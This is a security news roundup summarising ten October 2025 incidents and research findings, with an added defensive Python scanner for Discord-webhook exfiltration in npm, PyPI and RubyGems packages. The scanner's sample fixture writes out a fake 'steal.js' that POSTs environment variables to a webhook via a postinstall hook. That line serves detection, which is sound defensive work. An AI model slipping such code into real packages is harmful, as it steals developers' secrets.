CyberNews: 14/10/2025 Edition

Published by Dunateo on 2025-10-14

Today’s roundup

  • SimonMed says 1.2 million patients impacted in January data breach
  • Massive multi-country botnet targets RDP services in the US
  • RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing
  • New Pixnapping Android Flaw Lets Rogue Apps Steal 2FA Codes Without Permissions
  • npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
  • Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain
  • Chinese Hackers Use Trusted ArcGIS App For Year-Long Persistence
  • UK NCSC Reports 429 cyberattacks in a year, with nationally significant cases more than doubling
  • Unverified COTS hardware enables persistent attacks in small satellites via SpyChain
  • Satellites Are Leaking the World’s Secrets: Calls, Texts, Military and Corporate Data

Summary

    U.S. medical imaging provider SimonMed Imaging is notifying over 1.2 million individuals of a data breach from January 2025 that exposed sensitive patient information.

    A massive, multi-country botnet has been observed targeting Remote Desktop Protocol (RDP) services in the United States, operating from more than 100,000 IP addresses.

    AMD has released fixes for "RMPocalypse," a critical flaw discovered by ETH Zürich that breaks Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP) with a single 8-byte memory write to the Reverse Map Table (RMP), the structure SEV-SNP relies on to track which guest owns each physical page; once the RMP is corrupted, the integrity guarantees that confidential VMs depend on no longer hold.

    A new "Pixnapping" side-channel attack impacts Google and Samsung Android devices, allowing rogue apps to steal 2FA codes and sensitive data pixel-by-pixel without requiring permissions.

    Malicious packages across the npm, PyPI, and RubyGems ecosystems are abusing Discord webhooks to exfiltrate stolen developer data. Webhooks are write-only, so this is a one-way dead-drop exfiltration channel rather than true two-way command-and-control; its appeal is that the traffic goes to a widely trusted domain and costs the attacker no infrastructure of their own.
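    As an added illustration (this code is not from the article or from any of the affected ecosystems' tooling), the script below walks a directory of installed npm, PyPI and RubyGems package files and reports two indicators of the pattern described above: any Discord webhook URL embedded in package code, and npm lifecycle scripts (preinstall/install/postinstall/prepare) that execute automatically at install time. The package names, file contents and webhook IDs are constructed for the example and are not real packages.

```python
"""Scan installed packages for Discord-webhook exfiltration indicators.

Added example, not code from the article or any named project. The sample
package tree built by build_sample_tree() is constructed inline (fake package
names, fake webhook IDs) so the script runs offline.
"""
import json
import os
import re
import tempfile

# Discord webhook endpoints look like discord.com/api/webhooks/<id>/<token>;
# discordapp.com, ptb. and canary. are alternate hostnames for the same API.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+",
    re.IGNORECASE,
)
# npm lifecycle hooks that npm runs automatically during 'npm install'.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# File types worth reading in node_modules / site-packages / gems trees.
SCAN_EXT = (".js", ".mjs", ".cjs", ".py", ".rb", ".json", ".gemspec", ".sh")


def scan_file(path):
    """Return (path, indicator, detail) tuples found in one file."""
    findings = []
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return findings
    for match in WEBHOOK_RE.finditer(text):
        findings.append((path, "discord_webhook", match.group(0)))
    # package.json: flag any script that runs without the developer invoking it.
    if os.path.basename(path) == "package.json":
        try:
            scripts = json.loads(text).get("scripts", {})
        except ValueError:
            scripts = {}
        for hook in NPM_HOOKS:
            if hook in scripts:
                findings.append((path, "npm_lifecycle_hook", f"{hook}: {scripts[hook]}"))
    return findings


def scan_tree(root):
    """Recursively scan every candidate file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(SCAN_EXT):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


# Constructed sample packages: 'evil-pkg' and 'evil_helper' are hypothetical,
# as are the webhook IDs; 'good-pkg' and 'benign' are clean controls.
SAMPLE_FILES = {
    "node_modules/evil-pkg/package.json": json.dumps(
        {"name": "evil-pkg", "version": "1.0.0", "scripts": {"postinstall": "node steal.js"}}
    ),
    "node_modules/evil-pkg/steal.js": (
        'const h = "https://discord.com/api/webhooks/1234567890/AbCdEf-ghIJ";\n'
        'fetch(h, {method: "POST", body: JSON.stringify(process.env)});\n'
    ),
    "node_modules/good-pkg/package.json": json.dumps(
        {"name": "good-pkg", "version": "2.1.0", "scripts": {"test": "jest"}}
    ),
    "node_modules/good-pkg/index.js": "module.exports = () => 42;\n",
    "site-packages/evil_helper/__init__.py": (
        'import urllib.request\nURL = "https://discordapp.com/api/webhooks/99/zzz"\n'
    ),
    "gems/benign/benign.gemspec": 'Gem::Specification.new { |s| s.name = "benign" }\n',
}


def build_sample_tree():
    """Write the constructed sample files into a fresh temp directory."""
    root = tempfile.mkdtemp(prefix="pkgscan_")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the sample tree and scan it; returns the findings list."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for path, kind, detail in demo():
        print(f"{kind:20s} {path}\n    {detail}")
```

    Point scan_tree() at a real node_modules, site-packages or gems directory to use it outside the demo. A webhook URL in package code is a strong indicator on its own; a lifecycle hook is only a lead, since many legitimate packages use postinstall to build native code, so triage the two indicators together rather than treating hooks as malicious by themselves.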

    Researchers have exposed TA585, a previously undocumented threat actor, deploying MonsterV2 malware through phishing campaigns that use web injects to steer victims toward the payload.

    Chinese state-backed Flax Typhoon attackers maintained year-long persistent access to a victim's ArcGIS deployment by repurposing a legitimate, trusted ArcGIS component rather than dropping conventional malware, as detailed in a ReliaQuest report on nation-state activity; because the implant lived inside software the environment already trusted, it blended in with normal operation.

    The UK's NCSC reported 429 cyber incidents between September 2024 and August 2025, with "nationally significant" cases more than doubling to 204. The government urges FTSE 350 leaders to prioritize cyber resilience.

    "SpyChain" demonstrates persistent, multi-component supply chain attacks on small satellite systems using unverified COTS hardware, achieving covert data exfiltration through "stealth by design," tested with NASA’s NOS3 simulator.

    Unencrypted military, corporate, and personal data, including T-Mobile calls and texts, is reportedly being broadcast in the clear over satellite links, where it can be intercepted with as little as $800 of off-the-shelf receiving equipment.
